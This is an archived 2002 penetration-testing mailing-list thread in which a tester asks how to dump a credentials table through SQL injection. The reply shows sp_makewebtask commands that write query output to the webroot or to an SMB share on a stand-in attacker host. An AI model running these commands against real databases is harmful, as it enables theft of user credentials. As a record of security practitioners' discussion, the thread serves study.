Home page logo
/

pen-test logo Penetration Testing mailing list archives

Re: SQL Injection - retrieving all rows
From: "Kevin Spett" <kspett () spidynamics com>
Date: Wed, 20 Mar 2002 19:00:03 -0800


See if you can access sp_makewebtask.  It builds an html table with the
output of your query.  It's installed by default without any kind of access
control.  It works like this:
     sp_makewebtask 'c:\inetpub\wwwroot\sqloutput.html', 'SELECT name FROM
sysobjects WHERE xtype=''U'''
    (I'm pretty sure in SQL Server to use quoted parameters inside of quotes
you double single quotes, not double quotes.)
You can even specify a UNC path for the output file, like this:
     sp_makewebtask '\\www.evilserver.com\publicshare\sqloutput.html',
'SELECT name FROM sysobjects WHERE xtype=''U'''
The directory "publicshare" needs to be a wide open SMB share... if any kind
of authentication challenge is present, the file won't be recieved.

If that fails, you could use a perl or python script.



Kevin Spett
SPI Dynamics, Inc.


----- Original Message -----
From: "mel" <meling () scan-associates net>
To: <pen-test () securityfocus com>
Sent: Wednesday, March 20, 2002 3:24 AM
Subject: SQL Injection - retrieving all rows


Hi,

I've been able to enumerate over 50 plus tables in a recent pen-test,
now come the hard part - I want to dump data from the most important
table that contains user names and passwords. However, the ASP app
that I exploit only returns one row at a time. Is there anyway to
overcome this?

I've been looking for apps that return multiple rows (such as
search,etc)
but to know avail. I've tried dumping asp codes using BULK INSERT, but
the command is only available for system account. Creating an stored
procedure does not seem to work as well :(

Now, I'm thinking of writing a script that dump the data one at a time,
but I would like the advice from fellow pen-testers first.

Cheers,

--mel


--------------------------------------------------------------------------
--
This list is provided by the SecurityFocus Security Intelligence Alert
(SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please
see:
https://alerts.securityfocus.com/





----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault